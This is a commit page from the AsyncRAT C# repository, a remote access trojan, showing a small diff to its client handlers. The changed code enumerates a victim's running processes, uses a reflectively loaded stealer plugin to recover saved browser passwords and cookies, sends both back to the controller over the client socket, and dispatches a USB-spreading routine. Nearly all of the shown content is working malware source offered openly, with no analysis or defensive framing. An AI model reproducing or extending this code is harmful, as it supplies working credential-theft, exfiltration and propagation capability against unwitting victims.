Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Small update

Browse Source
This commit is contained in:
NYAN CAT 2019-06-11 14:56:01 +03:00
parent 81d48d1079
commit dee3582f35
3 changed files with 31 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
View File

@ -31,37 +31,41 @@ namespace Client.Handle_Packet
public void ProcessList() public void ProcessList()
{ {
StringBuilder sb = new StringBuilder(); try
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
using (var searcher = new ManagementObjectSearcher(query))
using (var results = searcher.Get())
{ {
var processes = results.Cast<ManagementObject>().Select(x => new StringBuilder sb = new StringBuilder();
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
using (var searcher = new ManagementObjectSearcher(query))
using (var results = searcher.Get())
{ {
ProcessId = (UInt32)x["ProcessId"], var processes = results.Cast<ManagementObject>().Select(x => new
Name = (string)x["Name"],
ExecutablePath = (string)x["ExecutablePath"]
});
foreach (var p in processes)
{
if (File.Exists(p.ExecutablePath))
{ {
string name = p.ExecutablePath; ProcessId = (UInt32)x["ProcessId"],
string key = p.ProcessId.ToString(); Name = (string)x["Name"],
Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath); ExecutablePath = (string)x["ExecutablePath"]
Bitmap bmpIcon = icon.ToBitmap(); });
using (MemoryStream ms = new MemoryStream()) foreach (var p in processes)
{
if (File.Exists(p.ExecutablePath))
{ {
bmpIcon.Save(ms, ImageFormat.Png); string name = p.ExecutablePath;
sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>"); string key = p.ProcessId.ToString();
Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath);
Bitmap bmpIcon = icon.ToBitmap();
using (MemoryStream ms = new MemoryStream())
{
bmpIcon.Save(ms, ImageFormat.Png);
sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>");
}
} }
} }
} }
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "processManager";
msgpack.ForcePathObject("Message").AsString = sb.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
} }
MsgPack msgpack = new MsgPack(); catch { }
msgpack.ForcePathObject("Packet").AsString = "processManager";
msgpack.ForcePathObject("Message").AsString = sb.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
} }
} }

6
AsyncRAT-C#/Client/Handle Packet/HandlerRecovery.cs
View File

@ -18,11 +18,11 @@ namespace Client.Handle_Packet
Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes()); Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
MethodInfo meth = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCredential"); MethodInfo meth = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCredential");
MethodInfo meth2 = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCookies"); MethodInfo meth2 = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCookies");
object InjObj = loader.CreateInstance(meth.Name); object injObj = loader.CreateInstance(meth.Name);
MsgPack msgpack = new MsgPack(); MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(InjObj, null); msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(injObj, null);
msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(InjObj, null); msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(injObj, null);
ClientSocket.Send(msgpack.Encode2Bytes()); ClientSocket.Send(msgpack.Encode2Bytes());
} }
catch (Exception ex) catch (Exception ex)

2
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -101,7 +101,7 @@ namespace Client.Handle_Packet
case "usbSpread": case "usbSpread":
{ {
new HandleLimeUSB().Run(); new HandleLimeUSB(unpack_msgpack);
break; break;
} }